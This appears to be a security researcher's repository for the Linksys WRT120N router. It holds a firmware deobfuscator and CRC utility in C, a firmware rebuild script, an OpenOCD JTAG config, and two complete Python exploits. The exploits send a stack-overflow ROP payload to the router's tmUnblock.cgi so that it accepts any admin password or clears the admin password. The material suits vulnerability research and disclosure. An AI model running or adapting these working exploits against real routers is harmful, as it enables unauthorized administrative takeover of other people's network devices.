├── README.md ├── deobfuscator ├── Makefile ├── crc.c ├── crc.h ├── crc.o ├── crc32.c ├── foo.bin ├── wrt120n └── wrt120n.c ├── exploits ├── accept-any-password.py └── clear-admin-password.py ├── firmware ├── FW_WRT120N_v1.0.07.002_US_DEBUG.bin └── build │ ├── build.sh │ └── web.img └── openocd └── wrt120n.cfg /README.md: -------------------------------------------------------------------------------- 1 | wrt120n 2 | ======= 3 | 4 | Tools for working with the WRT120N firmware. 5 | -------------------------------------------------------------------------------- /deobfuscator/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=wrt120n 2 | 3 | $(TARGET): crc.o 4 | $(CC) -Wall $(TARGET).c *.o -o $(TARGET) 5 | 6 | crc.o: 7 | $(CC) -Wall crc.c -c 8 | 9 | clean: 10 | rm -rf $(TARGET) *.o 11 | -------------------------------------------------------------------------------- /deobfuscator/crc.c: -------------------------------------------------------------------------------- 1 | #include "crc.h" 2 | 3 | /**********************************************************************/ 4 | /* The following was grabbed and tweaked from the old snippets collection 5 | * of public domain C code. */ 6 | 7 | /**********************************************************************\ 8 | |* Demonstration program to compute the 32-bit CRC used as the frame *| 9 | |* check sequence in ADCCP (ANSI X3.66, also known as FIPS PUB 71 *| 10 | |* and FED-STD-1003, the U.S. versions of CCITT's X.25 link-level *| 11 | |* protocol). The 32-bit FCS was added via the Federal Register, *| 12 | |* 1 June 1982, p.23798. I presume but don't know for certain that *| 13 | |* this polynomial is or will be included in CCITT V.41, which *| 14 | |* defines the 16-bit CRC (often called CRC-CCITT) polynomial. FIPS *| 15 | |* PUB 78 says that the 32-bit FCS reduces otherwise undetected *| 16 | |* errors by a factor of 10^-5 over 16-bit FCS. *| 17 | \**********************************************************************/ 18 | 19 | /* Copyright (C) 1986 Gary S. Brown. You may use this program, or 20 | code or tables extracted from it, as desired without restriction.*/ 21 | 22 | /* First, the polynomial itself and its table of feedback terms. The */ 23 | /* polynomial is */ 24 | /* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 */ 25 | /* Note that we take it "backwards" and put the highest-order term in */ 26 | /* the lowest-order bit. The X^32 term is "implied"; the LSB is the */ 27 | /* X^31 term, etc. The X^0 term (usually shown as "+1") results in */ 28 | /* the MSB being 1. */ 29 | 30 | /* Note that the usual hardware shift register implementation, which */ 31 | /* is what we're using (we're merely optimizing it by doing eight-bit */ 32 | /* chunks at a time) shifts bits into the lowest-order term. In our */ 33 | /* implementation, that means shifting towards the right. Why do we */ 34 | /* do it this way? Because the calculated CRC must be transmitted in */ 35 | /* order from highest-order term to lowest-order term. UARTs transmit */ 36 | /* characters in order from LSB to MSB. By storing the CRC this way, */ 37 | /* we hand it to the UART in the order low-byte to high-byte; the UART */ 38 | /* sends each low-bit to hight-bit; and the result is transmission bit */ 39 | /* by bit from highest- to lowest-order term without requiring any bit */ 40 | /* shuffling on our part. Reception works similarly. */ 41 | 42 | /* The feedback terms table consists of 256, 32-bit entries. Notes: */ 43 | /* */ 44 | /* 1. The table can be generated at runtime if desired; code to do so */ 45 | /* is shown later. It might not be obvious, but the feedback */ 46 | /* terms simply represent the results of eight shift/xor opera- */ 47 | /* tions for all combinations of data and CRC register values. */ 48 | /* */ 49 | /* 2. The CRC accumulation logic is the same for all CRC polynomials, */ 50 | /* be they sixteen or thirty-two bits wide. You simply choose the */ 51 | /* appropriate table. Alternatively, because the table can be */ 52 | /* generated at runtime, you can start by generating the table for */ 53 | /* the polynomial in question and use exactly the same "updcrc", */ 54 | /* if your application needn't simultaneously handle two CRC */ 55 | /* polynomials. (Note, however, that XMODEM is strange.) */ 56 | /* */ 57 | /* 3. For 16-bit CRCs, the table entries need be only 16 bits wide; */ 58 | /* of course, 32-bit entries work OK if the high 16 bits are zero. */ 59 | /* */ 60 | /* 4. The values must be right-shifted by eight bits by the "updcrc" */ 61 | /* logic; the shift must be unsigned (bring in zeroes). On some */ 62 | /* hardware you could probably optimize the shift in assembler by */ 63 | /* using byte-swap instructions. */ 64 | 65 | static const uint32_t crc_32_tab[] = { /* CRC polynomial 0xedb88320 */ 66 | 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 67 | 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 68 | 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 69 | 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 70 | 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 71 | 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 72 | 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 73 | 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 74 | 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 75 | 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 76 | 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 77 | 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 78 | 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 79 | 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 80 | 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 81 | 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 82 | 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 83 | 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 84 | 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 85 | 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 86 | 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 87 | 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 88 | 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 89 | 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 90 | 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 91 | 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 92 | 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 93 | 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 94 | 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 95 | 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 96 | 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 97 | 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 98 | 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 99 | 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 100 | 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 101 | 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 102 | 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 103 | 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 104 | 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 105 | 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 106 | 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 107 | 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 108 | 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d 109 | }; 110 | 111 | #define UPDC32(octet,crc) (crc_32_tab[((crc) ^ (octet)) & 0xff] ^ ((crc) >> 8)) 112 | 113 | uint32_t crc32(char *buf, size_t len) 114 | { 115 | uint32_t crc; 116 | 117 | crc = 0xFFFFFFFF; 118 | 119 | for ( ; len; --len, ++buf) 120 | { 121 | crc = UPDC32(*buf, crc); 122 | } 123 | 124 | return crc; 125 | } 126 | -------------------------------------------------------------------------------- /deobfuscator/crc.h: -------------------------------------------------------------------------------- 1 | #ifndef _CRC_H_ 2 | #define _CRC_H_ 3 | 4 | #include 5 | #include 6 | 7 | uint32_t crc32(char *buf, size_t len); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /deobfuscator/crc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devttys0/wrt120n/1d64d48f5ef8a34111fd4def571a1b0cdfc32d85/deobfuscator/crc.o -------------------------------------------------------------------------------- /deobfuscator/crc32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "crc.h" 4 | 5 | int main(int argc, char *argv[]) 6 | { 7 | FILE *fp = NULL; 8 | char *buf = NULL, *target = NULL; 9 | int retval = EXIT_FAILURE, offset = 0, len = 0, crc = 0; 10 | 11 | if(argc > 1) 12 | { 13 | switch(argc) 14 | { 15 | case 4: 16 | len = atoi(argv[3]); 17 | case 3: 18 | offset = atoi(argv[2]); 19 | case 2: 20 | target = argv[1]; 21 | } 22 | } 23 | else 24 | { 25 | fprintf(stderr, "Usage: %s [offset] [length]\n", argv[0]); 26 | goto end; 27 | } 28 | 29 | fp = fopen(target, "rb"); 30 | if(fp) 31 | { 32 | fseek(fp, offset, SEEK_SET); 33 | 34 | if(len == 0) 35 | { 36 | fseek(fp, 0L, SEEK_END); 37 | len = ftell(fp) - offset; 38 | fseek(fp, offset, SEEK_SET); 39 | } 40 | 41 | buf = malloc(len); 42 | if(!buf) 43 | { 44 | perror("malloc"); 45 | goto end; 46 | } 47 | 48 | if(fread(buf, 1, len, fp) == len) 49 | { 50 | crc = crc32(buf, len); 51 | printf(" CRC32: 0x%X\n", crc); 52 | printf("~CRC32: 0x%X\n", (unsigned int) (crc ^ 0xFFFFFFFFL)); 53 | 54 | retval = EXIT_SUCCESS; 55 | } 56 | else 57 | { 58 | perror("fread"); 59 | } 60 | } 61 | else 62 | { 63 | perror(target); 64 | } 65 | 66 | end: 67 | if(buf) free(buf); 68 | if(fp) fclose(fp); 69 | return retval; 70 | } 71 | -------------------------------------------------------------------------------- /deobfuscator/foo.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devttys0/wrt120n/1d64d48f5ef8a34111fd4def571a1b0cdfc32d85/deobfuscator/foo.bin -------------------------------------------------------------------------------- /deobfuscator/wrt120n: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devttys0/wrt120n/1d64d48f5ef8a34111fd4def571a1b0cdfc32d85/deobfuscator/wrt120n -------------------------------------------------------------------------------- /deobfuscator/wrt120n.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Deobfuscator for WRT120N firmware images. 3 | * 4 | * Craig Heffner 5 | * http://www.devttys0.com 6 | * 2014-01-15 7 | */ 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include "crc.h" 16 | 17 | #define OBFUSCATION_MAGIC "\x04\x01\x09\x20" 18 | #define OBFUSCATION_MAGIC_SIZE 4 19 | 20 | #define MAX_IMAGE_SIZE 0x1B0000 21 | 22 | #define BLOCK_SIZE 32 23 | #define BLOCK1_OFFSET 4 24 | #define BLOCK2_OFFSET 0x68 25 | #define MIN_FILE_SIZE (OBFUSCATION_MAGIC_SIZE + BLOCK2_OFFSET + BLOCK_SIZE) 26 | 27 | #define CRC32_SIZE 4 28 | #define CRC32_OFFSET 0x14 29 | 30 | void block_swap(char *data) 31 | { 32 | char block1_copy[BLOCK_SIZE] = { 0 }; 33 | 34 | /* Swap blocks 1 and 2 */ 35 | printf("Doing block swap...\n"); 36 | memcpy(block1_copy, data+BLOCK1_OFFSET, BLOCK_SIZE); 37 | memcpy(data+BLOCK1_OFFSET, data+BLOCK2_OFFSET, BLOCK_SIZE); 38 | memcpy(data+BLOCK2_OFFSET, block1_copy, BLOCK_SIZE); 39 | } 40 | 41 | void nibble_swap(char *data) 42 | { 43 | int i = 0; 44 | 45 | /* Nibble-swap the first 32 bytes of data */ 46 | printf("Doing nibble-swap...\n"); 47 | for(i=BLOCK1_OFFSET; i<(BLOCK1_OFFSET+BLOCK_SIZE); i++) 48 | { 49 | data[i] = ((data[i] & 0x0F) << 4) + ((data[i] & 0xF0) >> 4); 50 | } 51 | } 52 | 53 | void byte_swap(char *data) 54 | { 55 | int i = 0, j = 0, k = 0; 56 | 57 | /* Byte swap 16 two-byte pairs */ 58 | printf("Doing byte-swap...\n"); 59 | for(i=0; i<(BLOCK_SIZE/2); i++) 60 | { 61 | j = data[BLOCK1_OFFSET+(i*2)]; 62 | k = data[BLOCK1_OFFSET+(i*2)+1]; 63 | 64 | data[BLOCK1_OFFSET+(i*2)] = k; 65 | data[BLOCK1_OFFSET+(i*2)+1] = j; 66 | } 67 | } 68 | 69 | int crc(char *data, size_t size) 70 | { 71 | uint32_t new_crc = 0; 72 | 73 | size -= (size & 0x3FF); 74 | memset(data+(size-CRC32_OFFSET), 0xFF, CRC32_SIZE); 75 | 76 | new_crc = crc32(data, size) ^ 0xFFFFFFFF; 77 | memcpy(data+(size-CRC32_OFFSET), (void *) &new_crc, CRC32_SIZE); 78 | 79 | return new_crc; 80 | } 81 | 82 | void decode(char *data, size_t size) 83 | { 84 | block_swap(data); 85 | nibble_swap(data); 86 | byte_swap(data); 87 | } 88 | 89 | void encode(char *data, size_t size) 90 | { 91 | byte_swap(data); 92 | nibble_swap(data); 93 | block_swap(data); 94 | 95 | printf("New CRC: 0x%X\n", crc(data, size)); 96 | } 97 | 98 | 99 | int main(int argc, char *argv[]) 100 | { 101 | FILE *fp = NULL; 102 | size_t size = 0; 103 | int retval = EXIT_FAILURE; 104 | void (*action)(char *, size_t) = NULL; 105 | struct stat file_info = { 0 }; 106 | char *target_file = NULL, *out_file = NULL, *data = NULL; 107 | 108 | if(argc < 3) 109 | { 110 | fprintf(stderr, "Usage: %s [-e] \n", argv[0]); 111 | exit(retval); 112 | } 113 | 114 | out_file = argv[argc-1]; 115 | target_file = argv[argc-2]; 116 | 117 | if(argc == 4) 118 | { 119 | if(strcmp(argv[1], "-e") == 0) 120 | { 121 | action = encode; 122 | } 123 | } 124 | 125 | if(!action) 126 | { 127 | action = decode; 128 | } 129 | 130 | if(stat(target_file, (struct stat *) &file_info) == 0) 131 | { 132 | size = file_info.st_size; 133 | 134 | if(size >= MIN_FILE_SIZE) 135 | { 136 | fp = fopen(target_file, "rb"); 137 | if(fp) 138 | { 139 | data = malloc(size); 140 | if(data) 141 | { 142 | memset(data, 0, size); 143 | if(fread(data, size, 1, fp) != 1) 144 | { 145 | perror("fread"); 146 | } 147 | } 148 | else 149 | { 150 | perror("malloc"); 151 | } 152 | 153 | fclose(fp); 154 | } 155 | else 156 | { 157 | perror("fopen"); 158 | } 159 | } 160 | else 161 | { 162 | fprintf(stderr, "ERROR: File too small!\n"); 163 | } 164 | } 165 | else 166 | { 167 | perror("stat"); 168 | } 169 | 170 | if(data && size) 171 | { 172 | if(memcmp(data, OBFUSCATION_MAGIC, OBFUSCATION_MAGIC_SIZE) != 0) 173 | { 174 | printf("WARNING: Image does not start with the expected magic bytes!\nTrying anyway...\n"); 175 | } 176 | 177 | if(size > MAX_IMAGE_SIZE) 178 | { 179 | printf("WARNING: Image exceeds maximum image size (%d)\n", MAX_IMAGE_SIZE); 180 | } 181 | 182 | /* Encode / decode the data */ 183 | action(data, size); 184 | 185 | /* That's it! Write it to disk. */ 186 | printf("Saving data to %s...\n", out_file); 187 | fp = fopen(out_file, "wb"); 188 | if(fp) 189 | { 190 | if(fwrite(data, size, 1, fp) == 1) 191 | { 192 | printf("Done!\n"); 193 | retval = EXIT_SUCCESS; 194 | } 195 | else 196 | { 197 | perror("fopen"); 198 | } 199 | 200 | fclose(fp); 201 | } 202 | else 203 | { 204 | perror("fopen"); 205 | } 206 | } 207 | 208 | if(data) free(data); 209 | return retval; 210 | } 211 | -------------------------------------------------------------------------------- /exploits/accept-any-password.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # WRT120N v1.0.0.7 stack overflow, ROP to arbitrary 4-byte overwrite that 4 | # patches the firmware's code in memory to accept any administrative password. 5 | # 6 | # Craig Heffner 7 | # 2014-02-14 8 | 9 | import sys 10 | import urllib2 11 | 12 | try: 13 | target = sys.argv[1] 14 | except IndexError: 15 | print "Usage: %s " % sys.argv[0] 16 | sys.exit(1) 17 | 18 | url = target + '/cgi-bin/tmUnblock.cgi' 19 | if '://' not in url: 20 | url = 'http://' + url 21 | 22 | post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL=" 23 | post_data += "B" * 246 # Filler 24 | post_data += "D" * 4 # $s0, don't care 25 | post_data += "\x80\x23\xC3\x10" # $ra 26 | post_data += "C" * 0x28 # Stack filler 27 | post_data += "\x80\x1C\x99\x98" # ROP 1 $s0, address to write to 28 | post_data += "\x02\x10\x10\x23" # ROP 1 $s1, data to write (subu $v0, $s0, $s0) 29 | post_data += "\x80\x23\xC3\x04" # ROP 1 $ra (address of ROP 2) 30 | post_data += "E" * 4 # Stack filler 31 | 32 | for i in range(0, 4): 33 | post_data += "F" * 4 # ROP 2 $s0, don't care 34 | post_data += "G" * 4 # ROP 2 $s1, don't care 35 | post_data += "\x80\x23\xC3\x10" # ROP 2 $ra (just for moving $sp up by 0x10 each iteration) 36 | post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the 37 | # last stack frame where it needs to be 1 byte (to 38 | # account for the trailing "\n\n" and terminating 39 | # NULL byte) 40 | 41 | try: 42 | req = urllib2.Request(url, post_data) 43 | res = urllib2.urlopen(req) 44 | except urllib2.HTTPError as e: 45 | if e.code == 500: 46 | print "OK" 47 | else: 48 | print "Received unexpected server response:", str(e) 49 | except KeyboardInterrupt: 50 | pass 51 | -------------------------------------------------------------------------------- /exploits/clear-admin-password.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password. 4 | # 5 | # Craig Heffner 6 | # http://www.devttys0.com 7 | # 2014-02-14 8 | 9 | import sys 10 | import urllib2 11 | 12 | try: 13 | target = sys.argv[1] 14 | except IndexError: 15 | print "Usage: %s " % sys.argv[0] 16 | sys.exit(1) 17 | 18 | url = target + '/cgi-bin/tmUnblock.cgi' 19 | if '://' not in url: 20 | url = 'http://' + url 21 | 22 | post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL=" 23 | post_data += "B" * 246 # Filler 24 | post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory 25 | post_data += "\x80\x31\xF6\x34" # $ra 26 | post_data += "C" * 0x28 # Stack filler 27 | post_data += "D" * 4 # ROP 1 $s0, don't care 28 | post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2) 29 | post_data += "E" * 8 # Stack filler 30 | 31 | for i in range(0, 4): 32 | post_data += "F" * 4 # ROP 2 $s0, don't care 33 | post_data += "G" * 4 # ROP 2 $s1, don't care 34 | post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself) 35 | post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the 36 | # last stack frame where it needs to be 1 byte (to 37 | # account for the trailing "\n\n" and terminating 38 | # NULL byte) 39 | 40 | try: 41 | req = urllib2.Request(url, post_data) 42 | res = urllib2.urlopen(req) 43 | except urllib2.HTTPError as e: 44 | if e.code == 500: 45 | print "OK" 46 | else: 47 | print "Received unexpected server response:", str(e) 48 | except KeyboardInterrupt: 49 | pass 50 | -------------------------------------------------------------------------------- /firmware/FW_WRT120N_v1.0.07.002_US_DEBUG.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devttys0/wrt120n/1d64d48f5ef8a34111fd4def571a1b0cdfc32d85/firmware/FW_WRT120N_v1.0.07.002_US_DEBUG.bin -------------------------------------------------------------------------------- /firmware/build/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | OS_IMAGE="$1" 4 | OUT_IMAGE="$2" 5 | EXPECTED_IMAGE_SIZE="1041396" 6 | 7 | # Write magic signature out to file 8 | perl -e 'print "\x04\x01\x09\x20"' > "$OUT_IMAGE" 9 | 10 | # Compress input image 11 | lzma -z -e "$OS_IMAGE" 12 | 13 | # Super hack to put the size field back in the lzma header 14 | perl -e 'print "\x5d\x00\x00\x80\x00\x7c\x6a\x4d\x00\x00\x00\x00\x00\x00"' >> "$OUT_IMAGE" 15 | 16 | dd if="${OS_IMAGE}.lzma" bs=14 skip=1 >> "$OUT_IMAGE" 17 | 18 | CURRENT_IMAGE_SIZE=$(wc -c "$OUT_IMAGE" | awk '{print $1}') 19 | PAD_SIZE=$(($EXPECTED_IMAGE_SIZE-$CURRENT_IMAGE_SIZE)) 20 | 21 | # Pad out the image 22 | perl -e "print \"\xFF\"x$PAD_SIZE" >> "$OUT_IMAGE" 23 | 24 | cat web.img >> "$OUT_IMAGE" 25 | 26 | ../../deobfscator/wrt120n -e "$OUT_IMAGE" "${OUT_IMAGE}.upload.bin" 27 | -------------------------------------------------------------------------------- /firmware/build/web.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devttys0/wrt120n/1d64d48f5ef8a34111fd4def571a1b0cdfc32d85/firmware/build/web.img -------------------------------------------------------------------------------- /openocd/wrt120n.cfg: -------------------------------------------------------------------------------- 1 | # OpenOCD config file for the WRT120N 2 | # 3 | # Craig Heffner 4 | # 2014-02-05 5 | 6 | reset_config trst_and_srst connect_assert_srst srst_nogate 7 | 8 | adapter_nsrst_delay 100 9 | jtag_ntrst_delay 100 10 | 11 | jtag newtap mips cpu -irlen 5 -expected-id 0 12 | target create mips.cpu mips_m4k -endian big -chain-position mips.cpu 13 | --------------------------------------------------------------------------------